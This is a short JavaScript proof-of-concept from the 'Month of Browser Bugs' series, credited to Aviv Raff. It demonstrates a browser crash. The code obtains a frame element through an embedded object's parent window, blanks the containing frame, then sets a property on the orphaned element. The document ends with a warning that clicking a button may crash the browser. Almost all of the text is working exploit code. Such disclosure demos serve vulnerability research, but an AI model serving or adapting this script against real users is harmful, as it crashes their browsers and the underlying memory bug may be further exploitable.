// MoBB Demo
// Provided by Aviv Raff
// http://aviv.raffon.net/
var orphanObject;
function createOrphanObject() {
orphanObject=document.frames["emptyFrame"].document.getElementById("emptyObject").object.parentWindow.document.createElement("frame");
document.frames["emptyFrame"].location.href="about:blank";
window.setTimeout('crashBrowser()',1);
}
function crashBrowser() {
orphanObject.frameBorder="whateveryoulike";
}
function insertEmptyObject() {
return '';
}
Clicking the button below may crash your browser!